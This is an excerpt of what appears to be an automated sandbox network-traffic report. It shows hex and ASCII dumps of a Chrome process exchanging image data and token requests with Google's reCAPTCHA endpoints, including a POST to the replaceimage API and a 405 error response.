                                                                                                                                                                                                                                                                  2024-10-29 19:10:15 UTC1378INData Raw: 41 44 73 d3 3d 79 e8 78 ed 59 d2 24 17 12 49 15 ba 94 3b 8c 8e 30 15 b1 b7 91 8c f2 3a 01 cf 5a 21 28 c7 54 37 52 32 d7 a9 9b 1c eb f6 66 5d c8 a9 b4 6d 0a 08 c7 3d 32 7a 9e 3a ff 00 91 7f c2 ba 51 d7 fc 47 67 6b 75 79 25 b5 b5 c4 80 3c c6 20 c1 54 70 48 04 80 7e 99 f4 ad 7d 2f 48 b1 59 62 b9 9e 49 1d 42 a8 91 17 80 d9 04 75 c7 7f f3 c0 c0 ec f4 2d 47 46 d3 a4 8e 38 6d 61 6b 90 83 69 0a 64 30 2f 77 19 eb c1 03 8e f5 35 31 71 5a 45 5c 8e 74 f4 39 5f 14 78 66 7b 4d 54 8d 14 2a c4 60 41 b6 25 27 6c 81 42 b8 24 9e bb 81 3d 4e 01 fa 55 8b 7f 09 dc e9 97 11 4b 73 6a cf 08 da 43 90 db f2 40 39 0c 0f 5e 08 04 e3 a7 15 d7 58 6b 01 b5 5d e4 c4 2d d7 e6 6c 00 c7 19 c0 21 88 cf 03 38 ea 3a d5 3f 1d f8 a2 c4 cc 4a 5c 4b 2f 07 66 e4 ea 41 c1 e0 77 39 3d 7d eb 8f eb 15
                                                                                                                                                                                                                                                                  Data Ascii: ADs=yxY$I;0:Z!(T7R2f]m=2z:QGgkuy%< TpH~}/HYbIBu-GF8makid0/w51qZE\t9_xf{MT*`A%'lB$=NUKsjC@9^Xk]-l!8:?J\K/fAw9=}
                                                                                                                                                                                                                                                                  2024-10-29 19:10:15 UTC1378INData Raw: 12 45 16 63 f3 24 87 e7 2d 86 3b 54 e3 81 c1 c9 3d 72 3e ed 3b 4b 09 20 54 86 df 0b 96 1b 36 0c 2b ed c1 1e 84 00 31 8e fd b1 cd 24 e7 cb 79 db fd 5c 89 ba 43 99 00 cb 67 86 db 81 dc 76 23 a0 fc 1d 34 42 d4 b4 73 9d b1 3c 6c ad c6 c8 ca 01 b7 38 5e 83 07 b1 ea dd 0e 70 4e 9c a8 a8 c7 9b 77 ab 10 08 e4 43 e6 c7 0b 83 f3 8f dd 85 ed 9d c1 72 48 18 1c e3 3f 87 15 1e 25 46 32 c2 b6 d2 23 a3 4a 9b 4f 01 71 8e 09 3b 81 e0 0c 0c 81 9f 5e 92 b2 95 95 25 68 25 89 10 0d ca 06 e6 38 50 19 53 03 90 33 8c fb f4 ea 69 64 57 86 e8 ee 77 8e d7 0c 13 6c 7b f7 0e 0f 39 e3 20 97 1d 7b 8c f2 0e 69 2b bb 09 24 f6 23 78 ae 4e 25 06 66 0e fe 5a 87 1f 36 e5 52 d8 20 e7 a9 1d fd 47 5e 4d 2a db b8 91 a2 8e 44 68 c8 01 4b 95 1d 79 5d c3 90 38 07 00 8e 02 83 91 cd 3e e2 25 8d 1e dd
                                                                                                                                                                                                                                                                  Data Ascii: Ec$-;T=r>;K T6+1$y\Cgv#4Bs<l8^pNwCrH?%F2#JOq;^%h%8PS3idWwl{9 {i+$#xN%fZ6R G^M*DhKy]8>%
                                                                                                                                                                                                                                                                  2024-10-29 19:10:15 UTC1378INData Raw: d7 af 61 ce 7f 1a f9 86 4d 5f c4 b7 77 71 c4 be 30 be 8a 36 6f 9c 0b d6 21 98 72 08 f9 b8 53 92 77 67 b5 7a 37 89 7c 71 a3 0d 27 4b d3 21 d4 8d ed d5 b4 4a 6e ae 12 e7 3b a4 55 1b 86 72 7f da 19 fe 75 35 31 36 5c c6 b1 a4 e5 2b 1d a6 ab e2 4b 4d 3a 6c 61 25 47 8d 99 54 b6 d0 58 63 00 91 c0 18 27 9f a7 4a 9f 4d f1 36 9b 7b a7 8b d7 8b c9 66 93 79 c9 e5 4e 3b 71 d0 71 c1 cf e9 5e 3c 23 bd f1 15 c4 b6 da 46 59 f8 76 59 d8 46 4e e2 a0 f5 fa 8e 9f 5a e5 ad b5 bd 42 d6 07 55 94 c4 88 fb 99 0a ef 52 bf 77 07 39 03 70 27 3d ba 1a e5 86 36 4e 57 66 f2 c1 c3 93 4d cf a0 13 c5 1a 73 5c 5c b2 a4 ad 67 06 dd d2 28 3c ef ce 01 e0 8f e1 27 df 19 ab 72 df 7f 6d 58 a2 69 8f b1 4c aa 66 9b 71 06 34 04 70 08 eb cf a1 00 f1 c9 ef e5 31 eb f1 45 e1 fd 76 4d 3f 52 89 37 41 0b
                                                                                                                                                                                                                                                                  Data Ascii: aM_wq06o!rSwgz7|q'K!Jn;Uru516\+KM:la%GTXc'JM6{fyN;qq^<#FYvYFNZBURw9p'=6NWfMs\\g(<'rmXiLfq4p1EvM?R7A
                                                                                                                                                                                                                                                                  2024-10-29 19:10:15 UTC1378INData Raw: 7b 7b 56 73 23 47 85 52 a8 99 ee c0 31 3f c8 8e b8 35 72 d7 59 9a 29 55 d2 0b 69 1e 30 76 19 a2 05 41 3f c4 32 4f b7 e7 c1 aa d7 52 2c d3 3d dc eb b9 a5 76 65 5d e3 e4 00 9c 71 db b8 03 a7 f5 ec 87 32 dd 11 2e 56 f4 09 0b 49 1a 42 cb e6 39 4c 29 c9 cf fc 0b 8f 41 d3 3c e6 98 4d ba 8f 99 50 e7 8c 96 fb 9c e7 39 f6 e7 d0 9c 77 34 d5 9d 41 f3 7c ad b2 a7 ca 01 71 c7 5c 70 06 7f fa d5 23 c8 ac 53 29 e5 85 27 ee 1e a0 11 c9 ef 83 9c 71 d8 53 51 e8 2b 6e 4b 6e 05 d5 d3 c0 83 74 b2 70 a0 8d b8 1d f3 8f a0 fd 6a d9 bc d4 21 91 e3 f3 1e 42 08 05 8f 21 78 23 1d 38 3d 0f f9 35 49 66 78 db cc dc fe 63 72 a5 57 a7 73 81 9e 79 06 9d 35 b5 d4 68 b7 37 f6 d7 16 f1 b2 ab 47 23 c4 c3 78 cf 6c 80 08 18 27 39 ed 52 e3 7d c5 6e a4 cb b6 57 48 ed 9e 69 0f dd 05 4f 24 0c 60 1c
                                                                                                                                                                                                                                                                  Data Ascii: {{Vs#GR1?5rY)Ui0vA?2OR,=ve]q2.VIB9L)A<MP9w4A|q\p#S)'qSQ+nKntpj!B!x#8=5IfxcrWsy5h7G#xl'9R}nWHiO$`
                                                                                                                                                                                                                                                                  2024-10-29 19:10:15 UTC1378INData Raw: a5 8d 08 44 59 5e 3c 95 2c 00 cf af 20 8e 95 f4 f3 e4 94 7d d5 f8 2f cf e7 f8 1f 3c a9 55 bd e5 2d 3f 0b 6c fe 7a bf 91 bf e3 79 86 89 39 d5 66 d4 ee 3c 8b a2 6d e3 85 0e 04 7b 61 91 b8 3d 0e 42 f1 c0 39 1f 80 e1 1f e2 03 1b 2d 36 0b 79 b5 38 9d e1 65 12 7d a8 1d 80 ca 54 b9 06 33 8c 01 8c 67 b5 7a 9f 88 34 bb 2d 52 cb 75 d4 4d fb 99 3c c4 09 2e c2 49 42 80 16 ed 95 63 f9 fe 59 96 be 0b f0 6d a8 81 2d ec 24 56 b5 70 d0 b3 c8 e3 07 3b b1 9e fc 75 e3 b8 ac 6a 2a 8e ea 9e ff 00 f0 0e b8 b7 cd 75 aa eb fa 7c bf 42 9e a1 a7 cc de 20 d2 2d bf b4 6e a5 df 34 91 34 b7 12 8d cd 98 d8 9d 88 3f dd f5 ee 2b cd 2e 3c 50 a6 c6 ee f2 d1 ad 12 e2 cc b2 af 99 bd e5 61 bf 0c 8c a4 9e 08 1e 98 e3 15 ec fa d4 5b f5 fd 0d de 20 c6 39 64 90 e4 6e 2b 88 f1 9c 9f 4e 38 fa 57 2f
                                                                                                                                                                                                                                                                  Data Ascii: DY^<, }/<U-?lzy9f<m{a=B9-6y8e}T3gz4-RuM<.IBcYm-$Vp;uj*u|B -n44?+.<Pa[ 9dn+N8W/
                                                                                                                                                                                                                                                                  2024-10-29 19:10:15 UTC1378INData Raw: 21 ed 5e 2b a8 d9 d9 0a 8c 80 ca 57 0b ec dd bd 73 58 7e 1c b2 f1 4e 91 a7 eb d6 da 8e 93 7f 03 9b 16 58 a3 9a 07 fd eb 1d aa 7a f0 78 60 00 1d b8 f6 33 fc 41 f1 cf 8e 7c 03 e2 eb bf 0f 5d 5e 5b 93 6a 44 91 13 6e aa ae bd 54 f0 a0 ff 00 5f 7a 66 89 f1 f3 c5 6c 63 6b fb b8 26 8d 8a 90 86 d9 48 19 6e 41 66 c8 03 be 79 e9 ed 53 ec 24 d6 86 ee b2 bd 92 d4 b5 f0 be d7 52 4f 12 e9 f7 53 5a c7 63 6f 08 59 1e 39 d8 23 ca 80 9f ba bd 4e 31 9e 01 c7 b5 73 ba 5f c4 af 13 d9 16 85 ae 2e c3 3b 15 c1 91 91 91 89 38 1d 88 c7 e9 c5 7b b7 c3 cf 17 7f c2 71 b4 42 b6 ad 79 02 b4 f1 aa 46 16 44 e0 a3 3a 73 b4 91 92 a4 1c e3 23 d4 13 1d ff 00 8c fc 05 ad 6b 53 69 5a a5 84 0c e9 74 d6 6d 77 3d 88 f2 c3 02 50 80 e0 e4 e0 82 bc 70 7b 56 6e 16 dd 94 d2 8b d3 f0 3c eb c5 1e 24 d5
                                                                                                                                                                                                                                                                  Data Ascii: !^+WsX~NXzx`3A|]^[jDnT_zflck&HnAfyS$ROSZcoY9#N1s_.;8{qByFD:s#kSiZtmw=Pp{Vn<$
                                                                                                                                                                                                                                                                  2024-10-29 19:10:15 UTC1378INData Raw: f0 73 d7 ad 63 2c 17 24 ef 76 d2 ec 6a ab 49 c3 55 a9 53 48 f1 ad 85 d6 a2 2d a5 99 a3 f3 18 46 0c a0 02 8e 70 37 60 f2 14 8e 31 9c 71 9a c0 f8 bb a5 79 9a 84 1a 46 99 ab d8 b6 9d 1c 7b 9a 45 9d a4 05 5d be 56 c7 5c a6 01 19 3f c7 c7 4a c1 d5 fc 0b 2c da ce 89 0d ae 9f 71 24 53 5a 89 af 42 0d 8a 84 9d dc 91 c0 1b 73 cd 77 2b e0 9d 46 5f 22 29 e5 16 76 ed 82 11 d3 24 0c 85 20 64 f5 c0 0a 01 c7 6f 6c 69 08 51 c3 4e 2e 1b f9 98 ce a4 ea 5e 29 d9 7f 5f a7 de 79 0f c4 ab 2b 5f 0e e9 5a 4d be 9e d2 dd 46 ed 29 94 cb 10 8f 38 d9 82 0e 4f ab 75 1c 66 b8 c9 35 09 1e 72 02 05 32 21 0f b8 ee 63 db af 03 bf 5f 6f 7a f4 ef da 07 45 7d 26 6d 18 f9 91 30 99 a6 f2 c2 20 46 05 4c 59 e4 9e bc 8f a0 f5 ea 7c a5 e2 31 a9 62 53 70 39 3b 57 76 7e a3 fa fb d7 b7 85 6a ad 25 39
                                                                                                                                                                                                                                                                  Data Ascii: sc,$vjIUSH-Fp7`1qyF{E]V\?J,q$SZBsw+F_")v$ doliQN.^)_y+_ZMF)8Ouf5r2!c_ozE}&m0 FLY|1bSp9;Wv~j%9


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  63192.168.2.1649792142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:16 UTC998OUTPOST /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 5772
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.google.com
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:16 UTC5772OUTData Raw: 76 3d 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 26 63 3d 30 33 41 46 63 57 65 41 35 6c 44 53 32 31 72 41 6f 52 76 70 31 77 31 73 64 61 4b 62 72 48 4d 35 72 58 33 71 57 6d 73 33 44 79 64 4c 76 50 45 51 6c 70 58 79 55 43 4d 76 66 75 70 6c 34 54 75 77 59 34 31 63 50 68 4d 73 5f 6f 75 4f 55 6e 77 49 6c 50 4e 69 71 73 57 35 48 38 55 77 51 4f 31 67 6a 73 41 63 6c 70 2d 4a 71 69 75 68 6c 4b 71 45 59 5a 4d 6d 74 68 77 45 58 34 33 4e 6f 31 7a 72 62 35 64 43 58 62 69 50 31 4f 63 6b 66 46 35 6e 54 64 67 4c 76 4a 73 53 51 6b 6f 2d 4f 36 54 73 36 4f 68 71 59 69 62 65 37 55 34 45 6c 6e 64 6b 50 57 32 74 4c 39 42 53 48 5f 6a 70 64 53 6f 4b 69 36 41 38 30 4d 72 37 5f 33 37 70 34 5f 34 39 4a 56 68 76 57 67 68 6d 71 62 76 4d 57 52 73 4c 6e 65
                                                                                                                                                                                                                                                                  Data Ascii: v=-ZG7BC9TxCVEbzIO2m429usb&c=03AFcWeA5lDS21rAoRvp1w1sdaKbrHM5rX3qWms3DydLvPEQlpXyUCMvfupl4TuwY41cPhMs_ouOUnwIlPNiqsW5H8UwQO1gjsAclp-JqiuhlKqEYZMmthwEX43No1zrb5dCXbiP1OckfF5nTdgLvJsSQko-O6Ts6OhqYibe7U4ElndkPW2tL9BSH_jpdSoKi6A80Mr7_37p4_49JVhvWghmqbvMWRsLne
                                                                                                                                                                                                                                                                  2024-10-29 19:10:17 UTC694INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:16 GMT
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:17 UTC684INData Raw: 31 37 39 30 0d 0a 29 5d 7d 27 0a 5b 22 64 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 36 6a 66 76 49 34 38 52 74 34 50 32 71 51 78 36 4c 4d 5f 56 75 4e 67 45 41 4e 75 34 33 74 6a 7a 34 4a 7a 67 59 79 6b 45 35 48 76 67 66 6e 6d 4d 79 53 73 64 78 34 48 4a 4c 68 74 47 44 52 31 76 4e 74 4b 79 6d 32 62 34 33 39 52 4a 39 44 54 6a 6e 76 6e 37 62 4c 31 63 5a 57 54 59 78 62 75 37 57 6e 53 61 47 7a 7a 76 6c 43 68 76 56 4f 58 6e 51 78 31 6c 35 56 6c 71 33 64 4c 49 62 67 56 66 4c 64 74 77 5f 73 36 39 6a 31 65 48 44 42 45 5f 4e 32 5a 6a 38 64 43 43 77 41 61 54 4c 4f 53 58 32 4e 48 70 5a 4c 4c 35 56 51 6e 79 33 6d 39 52 72 6a 45 55 75 54 6a 42 69 55 64 6b 47 57 41 76 31 42 51 62 62 50 4d 6b 73 6c 70 41 50 48 4a 6f 30 39 65 39 64 65 51 35 5a 35 5a 76 7a 75 35 74 36 63
                                                                                                                                                                                                                                                                  Data Ascii: 1790)]}'["dresp","03AFcWeA6jfvI48Rt4P2qQx6LM_VuNgEANu43tjz4JzgYykE5HvgfnmMySsdx4HJLhtGDR1vNtKym2b439RJ9DTjnvn7bL1cZWTYxbu7WnSaGzzvlChvVOXnQx1l5Vlq3dLIbgVfLdtw_s69j1eHDBE_N2Zj8dCCwAaTLOSX2NHpZLL5VQny3m9RrjEUuTjBiUdkGWAv1BQbbPMkslpAPHJo09e9deQ5Z5Zvzu5t6c
                                                                                                                                                                                                                                                                  2024-10-29 19:10:17 UTC1378INData Raw: 68 30 4b 53 61 63 33 55 76 5f 55 46 75 4f 38 4f 62 33 66 2d 47 43 46 61 6f 52 33 76 4b 42 7a 69 6d 2d 44 54 52 54 65 5f 77 63 57 58 4b 77 6e 66 76 59 7a 4d 2d 4b 57 6c 62 62 75 6f 49 46 44 70 55 43 74 32 54 79 4e 5a 46 32 4e 54 78 4e 54 75 30 34 6d 7a 76 38 71 45 71 44 66 7a 31 66 6c 2d 42 6c 30 6d 75 75 73 61 4e 37 43 64 4d 79 5a 4f 50 46 4c 49 78 4d 74 72 78 46 4e 43 51 71 4c 31 47 6b 34 6e 5a 77 32 4c 41 50 42 4d 4b 70 59 79 58 68 5a 71 30 33 4b 57 79 78 72 71 5a 2d 47 4a 33 6d 56 63 35 75 6d 59 6c 45 79 62 30 66 36 72 45 57 4d 76 74 67 5a 39 69 61 71 35 6d 41 75 64 47 6b 79 76 49 43 70 48 4a 33 71 4d 6f 57 41 5a 78 6e 77 38 42 66 58 51 50 54 71 78 5a 69 71 77 47 34 59 5a 71 68 62 37 33 6b 66 76 47 70 74 66 36 5f 73 31 6e 78 52 45 41 39 47 56 6c 63 63
                                                                                                                                                                                                                                                                  Data Ascii: h0KSac3Uv_UFuO8Ob3f-GCFaoR3vKBzim-DTRTe_wcWXKwnfvYzM-KWlbbuoIFDpUCt2TyNZF2NTxNTu04mzv8qEqDfz1fl-Bl0muusaN7CdMyZOPFLIxMtrxFNCQqL1Gk4nZw2LAPBMKpYyXhZq03KWyxrqZ-GJ3mVc5umYlEyb0f6rEWMvtgZ9iaq5mAudGkyvICpHJ3qMoWAZxnw8BfXQPTqxZiqwG4YZqhb73kfvGptf6_s1nxREA9GVlcc
                                                                                                                                                                                                                                                                  2024-10-29 19:10:17 UTC1378INData Raw: 56 5f 68 5f 42 72 57 77 50 5f 2d 5a 54 4c 73 36 31 69 72 4f 50 48 32 43 77 37 61 51 72 6a 4e 30 79 43 6d 71 68 4c 42 4b 36 66 31 6b 53 6d 66 45 75 4a 68 6f 68 63 44 31 47 67 62 32 4c 4c 4e 4e 57 65 6b 69 71 72 6f 70 45 4f 31 5a 5a 39 73 69 65 56 5a 69 41 78 54 5f 63 42 48 4a 78 5a 43 7a 70 68 78 44 69 74 59 58 6a 46 42 6f 70 44 6c 76 66 44 4b 7a 38 39 31 4b 77 6a 46 4c 77 6f 49 74 4a 4f 70 5a 4a 51 5a 2d 51 7a 43 67 44 74 78 47 5a 6b 58 63 58 36 70 69 31 4e 55 2d 45 4b 31 56 77 56 47 35 30 31 5a 57 57 71 34 46 36 38 38 69 77 6c 70 69 5a 75 53 36 6d 51 67 64 6c 68 33 62 45 2d 62 4f 59 78 35 50 45 46 5f 58 68 70 68 41 33 36 7a 5f 31 65 61 66 71 35 31 34 6a 67 37 43 69 37 66 69 69 50 64 66 31 38 5a 44 37 33 41 54 62 36 44 33 54 37 49 37 45 6a 47 47 51 52 63
                                                                                                                                                                                                                                                                  Data Ascii: V_h_BrWwP_-ZTLs61irOPH2Cw7aQrjN0yCmqhLBK6f1kSmfEuJhohcD1Ggb2LLNNWekiqropEO1ZZ9sieVZiAxT_cBHJxZCzphxDitYXjFBopDlvfDKz891KwjFLwoItJOpZJQZ-QzCgDtxGZkXcX6pi1NU-EK1VwVG501ZWWq4F688iwlpiZuS6mQgdlh3bE-bOYx5PEF_XhphA36z_1eafq514jg7Ci7fiiPdf18ZD73ATb6D3T7I7EjGGQRc
                                                                                                                                                                                                                                                                  2024-10-29 19:10:17 UTC1378INData Raw: 54 66 6b 5f 63 7a 70 49 48 6e 2d 65 62 4e 31 7a 68 34 72 52 75 75 77 4c 57 42 36 6e 52 4b 5a 59 66 44 52 4f 37 6c 76 36 7a 79 74 78 69 69 7a 6f 66 32 66 4d 42 45 2d 63 33 6b 54 4a 69 61 6a 57 70 4b 58 41 57 63 61 4e 7a 38 70 64 61 6b 70 66 31 72 57 6c 6e 59 53 65 51 6d 70 52 6f 4e 52 47 31 78 71 45 44 6b 79 44 35 59 55 44 4a 31 6d 6c 59 6d 71 61 4f 46 4a 50 75 77 6d 5f 5f 58 30 6f 51 61 6d 47 36 54 54 47 73 6f 34 77 62 32 6c 6c 7a 54 6b 6d 30 79 54 32 79 66 69 53 65 5a 5a 43 48 6b 6f 36 65 57 71 68 75 4b 79 66 38 69 49 6e 78 6c 64 32 32 72 37 48 43 31 4e 5f 74 6f 76 6e 34 52 68 6e 33 32 39 4b 5a 6c 36 6a 5f 32 49 42 48 39 37 45 72 56 34 30 58 59 64 66 5f 6b 37 2d 4d 78 75 67 54 79 69 51 56 43 45 55 73 37 68 6b 48 58 61 41 79 72 46 44 31 36 61 38 54 32 5a
                                                                                                                                                                                                                                                                  Data Ascii: Tfk_czpIHn-ebN1zh4rRuuwLWB6nRKZYfDRO7lv6zytxiizof2fMBE-c3kTJiajWpKXAWcaNz8pdakpf1rWlnYSeQmpRoNRG1xqEDkyD5YUDJ1mlYmqaOFJPuwm__X0oQamG6TTGso4wb2llzTkm0yT2yfiSeZZCHko6eWqhuKyf8iInxld22r7HC1N_tovn4Rhn329KZl6j_2IBH97ErV40XYdf_k7-MxugTyiQVCEUs7hkHXaAyrFD16a8T2Z
                                                                                                                                                                                                                                                                  2024-10-29 19:10:17 UTC1222INData Raw: 37 52 42 37 45 57 33 45 5a 6a 39 62 70 79 73 50 75 56 74 73 63 4d 77 2d 70 64 61 68 79 64 47 33 6f 54 5a 54 58 2d 71 64 5a 79 68 52 56 6c 2d 45 55 34 52 5a 44 64 59 4c 42 7a 43 61 42 71 55 74 48 6f 41 48 6b 4b 58 71 75 67 37 38 71 77 41 63 70 2d 70 6c 69 67 68 59 47 47 7a 62 73 57 78 33 49 4e 69 35 58 34 48 6a 34 38 4b 61 64 5f 74 54 78 67 45 54 31 35 61 6b 64 2d 4f 4b 6f 7a 74 57 45 55 73 49 4c 70 58 52 65 35 4a 79 52 69 78 59 46 6b 77 34 78 64 75 43 78 7a 38 31 5a 50 49 5f 61 6b 6e 61 52 7a 4b 62 49 37 7a 61 4f 5a 74 51 77 49 70 39 61 30 70 43 51 79 6f 72 77 70 45 49 6c 39 42 78 36 36 55 48 47 7a 53 5a 65 77 52 33 35 64 5f 73 61 2d 62 4e 4b 68 47 4e 37 66 52 39 6d 65 65 4f 2d 52 4c 71 77 39 41 5f 4d 4c 44 64 49 72 57 77 72 59 46 7a 64 73 67 76 70 58 4f
                                                                                                                                                                                                                                                                  Data Ascii: 7RB7EW3EZj9bpysPuVtscMw-pdahydG3oTZTX-qdZyhRVl-EU4RZDdYLBzCaBqUtHoAHkKXqug78qwAcp-plighYGGzbsWx3INi5X4Hj48Kad_tTxgET15akd-OKoztWEUsILpXRe5JyRixYFkw4xduCxz81ZPI_aknaRzKbI7zaOZtQwIp9a0pCQyorwpEIl9Bx66UHGzSZewR35d_sa-bNKhGN7fR9meeO-RLqw9A_MLDdIrWwrYFzdsgvpXO
                                                                                                                                                                                                                                                                  2024-10-29 19:10:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  64192.168.2.1649793142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC612OUTGET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:18 GMT
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Allow: POST
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:18 UTC635INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
